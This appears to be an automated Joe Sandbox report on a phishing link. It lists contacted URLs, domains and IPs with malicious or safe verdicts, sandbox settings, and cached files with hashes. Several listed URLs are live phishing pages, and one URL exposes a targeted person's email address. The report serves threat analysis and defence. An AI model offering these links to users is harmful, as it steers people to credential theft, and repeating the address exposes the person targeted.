              https://i.ibb.co/G4TRWfJN/REMITTANCE-ADVICE-982636324-1.png0%Avira URL Cloudsafe
              https://ossin7fot.pelosfilhos.com.br/?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92602f271f80d96d&lang=auto0%Avira URL Cloudsafe
              https://i.ibb.co/Nh1JRsN/Share-Point.png0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/865828961:1742920071:wsJzvxjBvnrTFNhFz4QcQWpLr23PjLoMwj1Z-LfI0n0/92602f271f80d96d/sd_h3PU4XBKOakP2gpVeyHPPiCVIwPT.IhX8USOHHVE-1742924330-1.1.1.1-a9tHj0RWV46cor58YN5ZBLC9MxI.9r6GAEoaVVG0mgtgDy.IDbfkgsjik1q7WZBS0%Avira URL Cloudsafe
              https://upload.wikimedia.org/wikipedia/commons/thumb/8/87/PDF_file_icon.svg/1200px-PDF_file_icon.svg.png0%Avira URL Cloudsafe
              https://docusecureonlineauthenticate.skapparelbd.com/favicon.ico0%Avira URL Cloudsafe
              https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.com100%Avira URL Cloudphishing
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92602f271f80d96d/1742924331603/a06186267f9a53234bdaf93c3af884bff59bb9f410358683cc3d78775a83aad7/ySdFHeHnnWYx5FC0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92602f271f80d96d/1742924331607/2zgn4H3QFtBhzg40%Avira URL Cloudsafe
              https://ldaqmiesa.fictiougbo.ru/favicon.ico100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/ijQDIZUpIw7NnlvkASolZQ1B813ohEwMWz7wxvtWcYNm6mkgDmm78170100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/GDSherpa-bold.woff2100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/mn4fJ2HLn9Uw3VPFMSNDf0KbvFvrkDMNBQbij1JmwKhaOhuNTlOHiBbeg8Y78147100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/zuOxM8qSmFU00sOufqLd4sakvsYGyo100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/12z3Q4M8PabCFb8920100%Avira URL Cloudphishing
              https://aadcdn.msauthimages.net/dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/illustration?ts=6378670489577791000%Avira URL Cloudsafe
              https://ldaqmiesa.fictiougbo.ru/wxALWfU5ETUyvmQJOvfdzop4iZ3aSLxoCsT4Kvw12129100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/klNmSZj35YUESegMa2KJQwG9kOMxhlMosJqr6yggUDmkVVSKSRLtLLeAOFHaxiYTV1ab225100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/yzgiJjBin2JwCe25de92rsEYISnLKKsSibuk7vo90174100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/zc5KphanyLHbWPTNYHyljbFGkin5Zqr8FTLfw100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/qrfHxgKeu2tKuiSgwCl7JHA1idmBstY7isSXi9ATYZG8x5nbjgUKksWMa1h72yDxQLaef240100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/klwMHwMulA2IdrzZU0QtBhWShAoI2kvmGDklGbE89EI3rMX7NvvZVCwuBCMZP9iuv220100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/xy0OjismZXisvhpqH54cd30100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/qrd3XcgHAY2iNoCw03ad8wRPB3hghHyTZBXwAL2gJj5wQCEWF45131100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/34jOiDrdG3K2xY9IFtzP1ghJM97cr2wJnwLVj89110100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/GDSherpa-regular.woff2100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/GDSherpa-bold.woff100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf2.woff2100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/GDSherpa-regular.woff100%Avira URL Cloudphishing
              https://ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.es/9755142544112559254pmWjlgMPIPOHLKQMPERUYBLRMFPHVKOAKArsCK9a19lgcCMiZsFyzhWwx390%Avira URL Cloudsafe
              https://ldaqmiesa.fictiougbo.ru/ijgQ0CVymhNkpYAfOoHIbpxyN6zyB2A8J0jKAEoibCiGg12203100%Avira URL Cloudphishing
              https://aadcdn.msauthimages.net/dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/bannerlogo?ts=6378670489688685050%Avira URL Cloudsafe
              https://ldaqmiesa.fictiougbo.ru/optp7gQK5lVR4zdBP02eR21a0IaWJZ3htroKGmT7ughSgaEmy3tAcDRKML6Qep8rCef200100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf.woff2100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/lbbzFU9cG7n956YbztDc1aduPhkbdvMLKCBqlIVYQkaAGLd0t100%Avira URL Cloudphishing
              https://ldaqmiesa.fictiougbo.ru/uvVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZApMRdu3RNd67MlVtw7oEWHHR2t8JGp85UDgXLK6y78v3sztJef260100%Avira URL Cloudphishing
              https://ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.es/9755142544112559254pmWjlgMPIPOHLKQMPERUYBLRMFPHVKOAKAyz78uKAG5n56zIKS8Sop470%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=vxu7lV1e1jLQ4kXGXbykmdErz9twWeB8sH0m8SYSLxrTePiaDjv%2B%2BMlvaAW6F9yaC091zCYpfxTI3otR6Rp4UjfLDzfmfAwvF1yOm8A1RK5k%2Ffz7chVJ1GD0AH1S0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              a.nel.cloudflare.com
              		35.190.80.1
              		truefalse
                		high
                e329293.dscd.akamaiedge.net
                		23.209.72.31
                		truefalse
                  		high
                  ossin7fot.pelosfilhos.com.br
                  		108.167.188.184
                  		truefalse
                    		unknown
                    github.com
                    		140.82.112.3
                    		truefalse
                      		high
                      i.ibb.co
                      		207.174.26.219
                      		truefalse
                        		high
                        docusecureonlineauthenticate.skapparelbd.com
                        		192.185.195.216
                        		truetrue
                          		unknown
                          ldaqmiesa.fictiougbo.ru
                          		104.21.89.181
                          		truetrue
                            		unknown
                            code.jquery.com
                            		151.101.2.137
                            		truefalse
                              		high
                              xzes.kdyukk.ru
                              		172.67.195.178
                              		truefalse
                                		unknown
                                cdnjs.cloudflare.com
                                		104.17.25.14
                                		truefalse
                                  		high
                                  challenges.cloudflare.com
                                  		104.18.94.41
                                  		truefalse
                                    		high
                                    get.geojs.io
                                    		104.26.1.100
                                    		truefalse
                                      		high
                                      www.google.com
                                      		142.251.32.100
                                      		truefalse
                                        		high
                                        upload.wikimedia.org
                                        		208.80.154.240
                                        		truefalse
                                          		high
                                          d19d360lklgih4.cloudfront.net
                                          		18.164.124.91
                                          		truefalse
                                            		high
                                            objects.githubusercontent.com
                                            		185.199.110.133
                                            		truefalse
                                              		high
                                              ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.es
                                              		104.21.84.132
                                              		truefalse
                                                		unknown
                                                aadcdn.msauthimages.net
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  ok4static.oktacdn.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                      		high
                                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                        		high
                                                        https://docusecureonlineauthenticate.skapparelbd.com/favicon.icotrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ldaqmiesa.fictiougbo.ru/zc5KphanyLHbWPTNYHyljbFGkin5Zqr8FTLfwtrue
                                                        • Avira URL Cloud: phishing
                                                        		unknown
                                                        https://ldaqmiesa.fictiougbo.ru/zuOxM8qSmFU00sOufqLd4sakvsYGyotrue
                                                        • Avira URL Cloud: phishing
                                                        		unknown
                                                        https://ldaqmiesa.fictiougbo.ru/yzgiJjBin2JwCe25de92rsEYISnLKKsSibuk7vo90174true
                                                        • Avira URL Cloud: phishing
                                                        		unknown
                                                        https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                          		high
                                                          https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQtrue
                                                            		unknown
                                                            https://ldaqmiesa.fictiougbo.ru/wxALWfU5ETUyvmQJOvfdzop4iZ3aSLxoCsT4Kvw12129true
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            https://ldaqmiesa.fictiougbo.ru/mn4fJ2HLn9Uw3VPFMSNDf0KbvFvrkDMNBQbij1JmwKhaOhuNTlOHiBbeg8Y78147true
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            https://ldaqmiesa.fictiougbo.ru/12z3Q4M8PabCFb8920true
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                              		high
                                                              https://ldaqmiesa.fictiougbo.ru/GDSherpa-bold.woff2true
                                                              • Avira URL Cloud: phishing
                                                              		unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92602f271f80d96d&lang=autofalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                		high
                                                                https://ldaqmiesa.fictiougbo.ru/ijQDIZUpIw7NnlvkASolZQ1B813ohEwMWz7wxvtWcYNm6mkgDmm78170true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://aadcdn.msauthimages.net/dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/illustration?ts=637867048957779100false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.es/9755142544112559254pmWjlgMPIPOHLKQMPERUYBLRMFPHVKOAKAyz78uKAG5n56zIKS8Sop47false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/klNmSZj35YUESegMa2KJQwG9kOMxhlMosJqr6yggUDmkVVSKSRLtLLeAOFHaxiYTV1ab225true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://upload.wikimedia.org/wikipedia/commons/thumb/8/87/PDF_file_icon.svg/1200px-PDF_file_icon.svg.pngfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/qrfHxgKeu2tKuiSgwCl7JHA1idmBstY7isSXi9ATYZG8x5nbjgUKksWMa1h72yDxQLaef240true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://a.nel.cloudflare.com/report/v4?s=vxu7lV1e1jLQ4kXGXbykmdErz9twWeB8sH0m8SYSLxrTePiaDjv%2B%2BMlvaAW6F9yaC091zCYpfxTI3otR6Rp4UjfLDzfmfAwvF1yOm8A1RK5k%2Ffz7chVJ1GD0AH1Sfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/xy0OjismZXisvhpqH54cd30true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/qrd3XcgHAY2iNoCw03ad8wRPB3hghHyTZBXwAL2gJj5wQCEWF45131true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://ossin7fot.pelosfilhos.com.br/?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=false
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://i.ibb.co/Nh1JRsN/Share-Point.pngfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/klwMHwMulA2IdrzZU0QtBhWShAoI2kvmGDklGbE89EI3rMX7NvvZVCwuBCMZP9iuv220true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/865828961:1742920071:wsJzvxjBvnrTFNhFz4QcQWpLr23PjLoMwj1Z-LfI0n0/92602f271f80d96d/sd_h3PU4XBKOakP2gpVeyHPPiCVIwPT.IhX8USOHHVE-1742924330-1.1.1.1-a9tHj0RWV46cor58YN5ZBLC9MxI.9r6GAEoaVVG0mgtgDy.IDbfkgsjik1q7WZBSfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/34jOiDrdG3K2xY9IFtzP1ghJM97cr2wJnwLVj89110true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf2.woff2true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/GDSherpa-bold.wofftrue
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/GDSherpa-regular.woff2true
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://ldaqmiesa.fictiougbo.ru/GDSherpa-regular.wofftrue
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                  		high
                                                                  https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                                    		high
                                                                    https://ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.es/9755142544112559254pmWjlgMPIPOHLKQMPERUYBLRMFPHVKOAKArsCK9a19lgcCMiZsFyzhWwx39false
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92602f271f80d96d/1742924331607/2zgn4H3QFtBhzg4false
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                                      		high
                                                                      https://ldaqmiesa.fictiougbo.ru/lbbzFU9cG7n956YbztDc1aduPhkbdvMLKCBqlIVYQkaAGLd0ttrue
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92602f271f80d96d/1742924331603/a06186267f9a53234bdaf93c3af884bff59bb9f410358683cc3d78775a83aad7/ySdFHeHnnWYx5FCfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ldaqmiesa.fictiougbo.ru/ijgQ0CVymhNkpYAfOoHIbpxyN6zyB2A8J0jKAEoibCiGg12203true
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      https://ldaqmiesa.fictiougbo.ru/favicon.icotrue
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      https://i.ibb.co/G4TRWfJN/REMITTANCE-ADVICE-982636324-1.pngfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ldaqmiesa.fictiougbo.ru/uvVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZApMRdu3RNd67MlVtw7oEWHHR2t8JGp85UDgXLK6y78v3sztJef260true
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      https://aadcdn.msauthimages.net/dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/bannerlogo?ts=637867048968868505false
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ldaqmiesa.fictiougbo.ru/optp7gQK5lVR4zdBP02eR21a0IaWJZ3htroKGmT7ughSgaEmy3tAcDRKML6Qep8rCef200true
                                                                      • Avira URL Cloud: phishing
                                                                      		unknown
                                                                      https://get.geojs.io/v1/ip/geo.jsonfalse
                                                                        		high
                                                                        https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=true
                                                                          		unknown
                                                                          https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf.woff2true
                                                                          • Avira URL Cloud: phishing
                                                                          		unknown
                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/false
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comtrue
                                                                          • Avira URL Cloud: phishing
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          172.217.14.106
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          207.174.26.219
                                                                          		i.ibb.coUnited States
                                                                          		6079RCN-ASUSfalse
                                                                          140.82.112.3
                                                                          		github.comUnited States
                                                                          		36459GITHUBUSfalse
                                                                          172.67.195.178
                                                                          		xzes.kdyukk.ruUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          104.18.94.41
                                                                          		challenges.cloudflare.comUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          104.26.1.100
                                                                          		get.geojs.ioUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          142.251.40.206
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          172.67.193.83
                                                                          		unknownUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          142.250.65.238
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          142.250.80.3
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          142.251.32.100
                                                                          		www.google.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          104.21.84.132
                                                                          		ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.esUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          142.251.40.195
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          35.190.80.1
                                                                          		a.nel.cloudflare.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          172.217.165.131
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          23.209.72.31
                                                                          		e329293.dscd.akamaiedge.netUnited States
                                                                          		20940AKAMAI-ASN1EUfalse
                                                                          108.167.188.184
                                                                          		ossin7fot.pelosfilhos.com.brUnited States
                                                                          		46606UNIFIEDLAYER-AS-1USfalse
                                                                          185.199.110.133
                                                                          		objects.githubusercontent.comNetherlands
                                                                          		54113FASTLYUSfalse
                                                                          192.185.195.216
                                                                          		docusecureonlineauthenticate.skapparelbd.comUnited States
                                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                                          18.164.124.91
                                                                          		d19d360lklgih4.cloudfront.netUnited States
                                                                          		3MIT-GATEWAYSUSfalse
                                                                          23.209.72.9
                                                                          		unknownUnited States
                                                                          		20940AKAMAI-ASN1EUfalse
                                                                          1.1.1.1
                                                                          		unknownAustralia
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          172.67.190.141
                                                                          		unknownUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          142.251.40.238
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          208.80.154.240
                                                                          		upload.wikimedia.orgUnited States
                                                                          		14907WIKIMEDIAUSfalse
                                                                          142.250.80.74
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          104.21.84.180
                                                                          		unknownUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          151.101.2.137
                                                                          		code.jquery.comUnited States
                                                                          		54113FASTLYUSfalse
                                                                          18.164.124.110
                                                                          		unknownUnited States
                                                                          		3MIT-GATEWAYSUSfalse
                                                                          142.251.167.84
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          104.21.89.181
                                                                          		ldaqmiesa.fictiougbo.ruUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          104.17.25.14
                                                                          		cdnjs.cloudflare.comUnited States
                                                                          		13335CLOUDFLARENETUSfalse

                                                                          Private

                                                                          IP
                                                                          192.168.2.16

                                                                          General Information

                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1648331
                                                                          Start date and time:2025-03-25 18:38:14 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                          Sample URL:https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:16
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • EGA enabled
                                                                          Analysis Mode:stream
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal100.phis.evad.win@26/42@57/286
                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 142.251.40.238, 142.250.80.3, 142.251.40.206, 142.251.167.84, 142.250.80.46, 142.250.65.206, 172.217.14.106, 142.250.68.10, 142.250.176.10, 142.250.72.138, 142.250.72.170, 142.251.40.42, 142.250.217.138, 172.217.12.138, 142.250.68.42, 142.250.188.234, 142.250.68.74, 142.251.40.110
                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=

                                                                          Created / dropped Files

                                                                          Chrome Cache Entry: 101

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                          Category:downloaded
                                                                          Size (bytes):28000
                                                                          Entropy (8bit):7.99335735457429
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                          SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                          SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                          SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/GDSherpa-bold.woff2
                                                                          Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.

                                                                          Chrome Cache Entry: 102

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:dropped
                                                                          Size (bytes):9648
                                                                          Entropy (8bit):7.9099172475143416
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:4946EB373B18D178C93D473489673BB6
                                                                          SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                          SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                          SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....

                                                                          Chrome Cache Entry: 103

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):16
                                                                          Entropy (8bit):3.625
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:2824F3BA5F591CD0F71B7F459AD29AE5
                                                                          SHA1:65369608C6BD54AC4C703B6904D17D7D759878BE
                                                                          SHA-256:0C0A807545A0344B360C0F692D284799A2447310C7A9AACF3CB92C22D13E906A
                                                                          SHA-512:C1C3FFD34A4E9131B0F68CF6A2A35B62994D55332D18BA06E3464C213D4245B6C89DD55E797317078A3705E265D65AC232E042C8BB9531F65871659EE4DA50DD
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCXM7b8YtHpGjEgUNcK7ZCSHJzvqhYdCgoQ==?alt=proto
                                                                          Preview:CgkKBw1wrtkJGgA=

                                                                          Chrome Cache Entry: 104

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):268
                                                                          Entropy (8bit):5.111190711619041
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:59759B80E24A89C8CD029B14700E646D
                                                                          SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                          SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                          SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                          Malicious:false
                                                                          Reputation:unknown
